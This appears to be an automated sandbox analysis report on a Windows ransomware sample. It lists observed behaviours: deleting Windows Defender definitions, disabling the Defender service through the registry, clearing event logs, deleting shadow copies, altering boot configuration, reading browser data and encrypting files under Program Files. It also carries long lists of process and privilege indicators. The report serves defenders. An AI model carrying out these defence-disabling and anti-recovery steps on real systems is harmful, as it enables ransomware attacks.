Analysis
-
max time kernel
146s -
max time network
222s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Resource
win10-en-20211208
General
-
Target
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
-
Size
2.7MB
-
MD5
8486072a80d4cef5b18407ffa74a965d
-
SHA1
b3bbdd7d990092b8545c04bf6cea5572c1d1cb4c
-
SHA256
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1
-
SHA512
dea0bc47c7b3b178e128d2349ede55d7c13cd5884ce49a178668b9e0a527f2f415eef432a5523c8c129436e37d8a7f424ce0dbebf95b89e22a9d7a1c15c083e5
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2764 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3912 bcdedit.exe 3680 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_DnTK7PokP380.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_JA-JP.respack 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-32_altform-unplated.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_1kPPmz_Z2bw0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_62vLodfrHxI0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_3gGr2aH_BYM0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\CenterView.scale-180.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_QPJtQceSzFg0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\7.jpg 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPage\mainPage_more_themes.jpg 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_iDQQwple6hk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-black_scale-200.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\snooze.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailLargeTile.scale-150.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-200_contrast-white.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-125.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-400.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\bg_get.svg.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_w-7-LaoP5sc0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_pTjNFEeNwaU0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_MI5BCxlwHfQ0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Livetiles\MicrosoftSolitaireAppList.targetsize-40_altform-unplated.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_lPNdsMx2AWI0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20_altform-unplated_contrast-black.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-100.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\mk_16x11.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-48.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_bAGJ36vlgJg0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_bTC7arMXKiM0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\tv_16x11.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleSmallTile.scale-200.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-80.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_audit_report_18.svg.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_G_AzTkLXXaA0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_aDNUKyQG7Wc0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_jRC7aa3ub680.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-text.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_HPQJ92A4DRk0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ul-oob.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_ccl8lsl312k0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN022.XML.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_YhUHI9SgoFc0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionMedTile.scale-400.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Resources\RetailDemo\strings\en-us\resources.resjson 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_KMS_Client-ul.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_D6GkbtamK7c0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_VZp8cGpp9pA0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Grunge Texture.eftx.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT__3ANxj7ajvM0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xecd1.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-32.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close2x.png.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_7uvTaMR98700.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA\msipc.dll.mui.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_TYMWVKQ_M-E0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_uIrEA0rRcy00.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_7DD4STECCQ00.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OFFSYMSL.TTF.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_e4VeWvn7IF80.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageSplashScreen.scale-100.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-100.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-100.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-72_altform-unplated_contrast-white.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_OyHFUyw8MoY0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_IOfKApN4h480.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldBeNullOrEmpty.snippets.ps1xml 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_K0CXDD53VGs0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_K_COL.HXK.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_5Vem_Z__QVE0.iavpt 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\AppxSignature.p7x 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8041_24x24x32.png 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1680 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exepid process 2564 powershell.exe 2564 powershell.exe 2564 powershell.exe 1780 powershell.exe 1780 powershell.exe 1780 powershell.exe 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1848 wevtutil.exe Token: SeBackupPrivilege 1848 wevtutil.exe Token: SeSecurityPrivilege 2424 wevtutil.exe Token: SeBackupPrivilege 2424 wevtutil.exe Token: SeSecurityPrivilege 2140 wevtutil.exe Token: SeBackupPrivilege 2140 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1164 wmic.exe Token: SeSecurityPrivilege 1164 wmic.exe Token: SeTakeOwnershipPrivilege 1164 wmic.exe Token: SeLoadDriverPrivilege 1164 wmic.exe Token: SeSystemProfilePrivilege 1164 wmic.exe Token: SeSystemtimePrivilege 1164 wmic.exe Token: SeProfSingleProcessPrivilege 1164 wmic.exe Token: SeIncBasePriorityPrivilege 1164 wmic.exe Token: SeCreatePagefilePrivilege 1164 wmic.exe Token: SeBackupPrivilege 1164 wmic.exe Token: SeRestorePrivilege 1164 wmic.exe Token: SeShutdownPrivilege 1164 wmic.exe Token: SeDebugPrivilege 1164 wmic.exe Token: SeSystemEnvironmentPrivilege 1164 wmic.exe Token: SeRemoteShutdownPrivilege 1164 wmic.exe Token: SeUndockPrivilege 1164 wmic.exe Token: SeManageVolumePrivilege 1164 wmic.exe Token: 33 1164 wmic.exe Token: 34 1164 wmic.exe Token: 35 1164 wmic.exe Token: 36 1164 wmic.exe Token: SeIncreaseQuotaPrivilege 2428 wmic.exe Token: SeSecurityPrivilege 2428 wmic.exe Token: SeTakeOwnershipPrivilege 2428 wmic.exe Token: SeLoadDriverPrivilege 2428 wmic.exe Token: SeSystemProfilePrivilege 2428 wmic.exe Token: SeSystemtimePrivilege 2428 wmic.exe Token: SeProfSingleProcessPrivilege 2428 wmic.exe Token: SeIncBasePriorityPrivilege 2428 wmic.exe Token: SeCreatePagefilePrivilege 2428 wmic.exe Token: SeBackupPrivilege 2428 wmic.exe Token: SeRestorePrivilege 2428 wmic.exe Token: SeShutdownPrivilege 2428 wmic.exe Token: SeDebugPrivilege 2428 wmic.exe Token: SeSystemEnvironmentPrivilege 2428 wmic.exe Token: SeRemoteShutdownPrivilege 2428 wmic.exe Token: SeUndockPrivilege 2428 wmic.exe Token: SeManageVolumePrivilege 2428 wmic.exe Token: 33 2428 wmic.exe Token: 34 2428 wmic.exe Token: 35 2428 wmic.exe Token: 36 2428 wmic.exe Token: SeIncreaseQuotaPrivilege 2428 wmic.exe Token: SeSecurityPrivilege 2428 wmic.exe Token: SeTakeOwnershipPrivilege 2428 wmic.exe Token: SeLoadDriverPrivilege 2428 wmic.exe Token: SeSystemProfilePrivilege 2428 wmic.exe Token: SeSystemtimePrivilege 2428 wmic.exe Token: SeProfSingleProcessPrivilege 2428 wmic.exe Token: SeIncBasePriorityPrivilege 2428 wmic.exe Token: SeCreatePagefilePrivilege 2428 wmic.exe Token: SeBackupPrivilege 2428 wmic.exe Token: SeRestorePrivilege 2428 wmic.exe Token: SeShutdownPrivilege 2428 wmic.exe Token: SeDebugPrivilege 2428 wmic.exe Token: SeSystemEnvironmentPrivilege 2428 wmic.exe Token: SeRemoteShutdownPrivilege 2428 wmic.exe Token: SeUndockPrivilege 2428 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3224 wrote to memory of 1708 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 1708 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1708 wrote to memory of 3708 1708 net.exe net1.exe PID 1708 wrote to memory of 3708 1708 net.exe net1.exe PID 3224 wrote to memory of 1252 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 1252 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1252 wrote to memory of 2912 1252 net.exe net1.exe PID 1252 wrote to memory of 2912 1252 net.exe net1.exe PID 3224 wrote to memory of 1920 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 1920 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1920 wrote to memory of 1764 1920 net.exe net1.exe PID 1920 wrote to memory of 1764 1920 net.exe net1.exe PID 3224 wrote to memory of 708 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 708 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 708 wrote to memory of 3548 708 net.exe net1.exe PID 708 wrote to memory of 3548 708 net.exe net1.exe PID 3224 wrote to memory of 884 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 884 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 884 wrote to memory of 1216 884 net.exe net1.exe PID 884 wrote to memory of 1216 884 net.exe net1.exe PID 3224 wrote to memory of 1872 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 1872 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1872 wrote to memory of 1440 1872 net.exe net1.exe PID 1872 wrote to memory of 1440 1872 net.exe net1.exe PID 3224 wrote to memory of 536 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 536 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 536 wrote to memory of 2248 536 net.exe net1.exe PID 536 wrote to memory of 2248 536 net.exe net1.exe PID 3224 wrote to memory of 1248 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 1248 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1248 wrote to memory of 2388 1248 net.exe net1.exe PID 1248 wrote to memory of 2388 1248 net.exe net1.exe PID 3224 wrote to memory of 1776 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 3224 wrote to memory of 1776 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1776 wrote to memory of 1996 1776 net.exe net1.exe PID 1776 wrote to memory of 1996 1776 net.exe net1.exe PID 3224 wrote to memory of 2576 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2576 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2460 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2460 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3220 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 3220 3224 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 3224 wrote to memory of 2980 3224 